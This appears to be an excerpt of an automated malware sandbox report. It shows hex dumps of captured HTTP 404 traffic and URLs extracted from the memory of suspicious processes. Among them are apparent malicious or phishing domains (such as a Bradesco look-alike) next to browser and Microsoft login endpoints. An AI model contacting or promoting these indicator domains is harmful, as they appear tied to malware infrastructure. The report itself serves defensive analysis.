eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:48:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:48:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 10:48:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 10:48:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateContent-Encoding: gzipStrict-Transport-Security: max-age=31536000Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 b5 5c c9 a5 8e 51 ca 7e 46 ba 8a b6 46 db 70 45 db b4 9d cc 29 45 e9 ed 55 a2 e0 c9 44 32 44 af 52 63 42 67 99 82 6d 6a a8 9f 28 da 56 c9 98 b8 ea da 93 4e 91 12 0e 17 71 aa 1f d4 5a a0 0a fc a0 4e c5 89 98 6c 0b 27 13 3d 20 5d b5 1d 4d aa 3a 6a 25 53 70 a8 7a 4d c2 6b 54 9a 34 e3 b6 19 7a 9a 54 2a d3 44 01 66 e1 d7 99 ca b4 78 9e 28 19 8e cb 40 4a 7c 09 64 25 66 57 32 81 4c c9 a0 a6 e6 52 36 5b 51 35 cd b0 26 32 00 01 8f 04 0e 7e 13 d6 b9 e1 c0 bc 6a 9a 3c 4c 77 b2 0c a4 cf 48 10 2e 53 0d 8b 3a e4 30 98 54 b0 19 b3 cb dc 96 c8 0f 37 dd 23 dc 33 e9 04 b5 b4 84 65 4b 74 ba a2 5a 9a 04 c0 2d 37 52 e8 03 3a 02 c2 dc 99 6c 98 60 08 12 ca 24 09 02 e8 85 00 99 0d 08 4d f3 9f 6c 28 8b ba 0a e9 87 4f 21 7f 35 e2 04 f0 94 25 5d 9c ea 68 fe 22 dc 03 f3 60 40 cd 98 86 75 2d ae 66 a6 0c d7 60 54 0b 4d 29 4a df c8 e8 a8 28 af 28 00 57 d1 ed 29 ea cc 62 a5 4a 1a 2d da 8e ca 0c db ca 58 b6 45 11 52 4f ce b6 cd a4 78 8a c3 e0 c2 ca 18 05 68 94 4c 45 24 93 bc 9e 0f 4b 0e 0d 85 35 a4 a7 0f 08 63 e5 04 c2 41 6d 00 71 21 7e 44 ab e7 80 56 aa 43 0b 93 a0 00 55 9f 9d d2 a1 8f 21 ac aa a1 31 3d 33 d0 db 1d c2 63 42 10 3b 2c a1 5e d0 48 75 13 f1 2b cb 43 0d 1a 30 c6 1c 5a 98 2c ea 94 91 8b 63 b1 78 d8 8f 91 fe 23 5d d0 30 bc e3 90 82 82 5a bc 36 e1 e0 30 80 2a e3 77 cf 0c f5 f7 7d 98 e2 ee 60 dd 51 8b cd 86 8c 70 2f 52 dd d9 8a 0d 89 42 be 1d 6a 02 f1 53 9c f3 44 47 b5 c6 b1 4f 11 a0 5d c0 b3 6d 7b 99 53 68 ff 70 a8 bc 7c a1 9e 5a a1 22 b3 c7 18 ec 40 27 95 a8 ab 22 27 3c 10 8d 42 ff 98 ae 64 d2 12 0b d8 4d 9f e9 ce 96 4c 5b 65 19 bc 19 10 2d 39 7c ce 40 88 98 8d 50 8b df 0c d4 7a d3 07 d4 b0 0a 01 a5 9a d1 0d 4d a3 16 57 83 31 07 77 af c2 7f 17 38 8a 24 f3 aa 2e c6 58 12 22 2a 1b 96 14 b
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.7.0Date: Tue, 03 Sep 2024 10:48:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: privateContent-Encoding: gzipStrict-Transport-Security: max-age=31536000Data Raw: 34 38 36 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 b5 5c c9 a5 8e 51 ca 7e 46 ba 8a b6 46 db 70 45 db b4 9d cc 29 45 e9 ed 55 a2 e0 c9 44 32 44 af 52 63 42 67 99 82 6d 6a a8 9f 28 da 56 c9 98 b8 ea da 93 4e 91 12 0e 17 71 aa 1f d4 5a a0 0a fc a0 4e c5 89 98 6c 0b 27 13 3d 20 5d b5 1d 4d aa 3a 6a 25 53 70 a8 7a 4d c2 6b 54 9a 34 e3 b6 19 7a 9a 54 2a d3 44 01 66 e1 d7 99 ca b4 78 9e 28 19 8e cb 40 4a 7c 09 64 25 66 57 32 81 4c c9 a0 a6 e6 52 36 5b 51 35 cd b0 26 32 00 01 8f 04 0e 7e 13 d6 b9 e1 c0 bc 6a 9a 3c 4c 77 b2 0c a4 cf 48 10 2e 53 0d 8b 3a e4 30 98 54 b0 19 b3 cb dc 96 c8 0f 37 dd 23 dc 33 e9 04 b5 b4 84 65 4b 74 ba a2 5a 9a 04 c0 2d 37 52 e8 03 3a 02 c2 dc 99 6c 98 60 08 12 ca 24 09 02 e8 85 00 99 0d 08 4d f3 9f 6c 28 8b ba 0a e9 87 4f 21 7f 35 e2 04 f0 94 25 5d 9c ea 68 fe 22 dc 03 f3 60 40 cd 98 86 75 2d ae 66 a6 0c d7 60 54 0b 4d 29 4a df c8 e8 a8 28 af 28 00 57 d1 ed 29 ea cc 62 a5 4a 1a 2d da 8e ca 0c db ca 58 b6 45 11 52 4f ce b6 cd a4 78 8a c3 e0 c2 ca 18 05 68 94 4c 45 24 93 bc 9e 0f 4b 0e 0d 85 35 a4 a7 0f 08 63 e5 04 c2 41 6d 00 71 21 7e 44 ab e7 80 56 aa 43 0b 93 a0 00 55 9f 9d d2 a1 8f 21 ac aa a1 31 3d 33 d0 db 1d c2 63 42 10 3b 2c a1 5e d0 48 75 13 f1 2b cb 43 0d 1a 30 c6 1c 5a 98 2c ea 94 91 8b 63 b1 78 d8 8f 91 fe 23 5d d0 30 bc e3 90 82 82 5a bc 36 e1 e0 30 80 2a e3 77 cf 0c f5 f7 7d 98 e2 ee 60 dd 51 8b cd 86 8c 70 2f 52 dd d9 8a 0d 89 42 be 1d 6a 02 f1 53 9c f3 44 47 b5 c6 b1 4f 11 a0 5d c0 b3 6d 7b 99 53 68 ff 70 a8 bc 7c a1 9e 5a a1 22 b3 c7 18 ec 40 27 95 a8 ab 22 27 3c 10 8d 42 ff 98 ae 64 d2 12 0b d8 4d 9f e9 ce 96 4c 5b 65 19 bc 19 10 2d 39 7c ce 40 88 98 8d 50 8b df 0c d4 7a d3 07 d4 b0 0a 01 a5 9a d1 0d 4d a3 16 57 83 31 07 77 af c2 7f 17 38 8a 24 f3 aa 2e c6 58 12 22 2a 1b 96 14 b
            Source: chkntfs.exe, 00000003.00000002.3536613638.0000000005992000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003EC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJ
            Source: chkntfs.exe, 00000003.00000002.3536613638.0000000004E94000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.00000000033C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.0000000036994000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725360363.0067147854&other_args=eyJ1cmkiOiAiL
            Source: SCsLZYqthBle.exe, 00000007.00000002.3537571964.00000000054AD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dfbio.net
            Source: SCsLZYqthBle.exe, 00000007.00000002.3537571964.00000000054AD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dfbio.net/yzen/
            Source: firefox.exe, 00000008.00000002.2174561801.0000000036994000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www70.clientebradesco.online/
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: chkntfs.exe, 00000003.00000002.3535509329.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: chkntfs.exe, 00000003.00000003.2062946532.000000000746F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
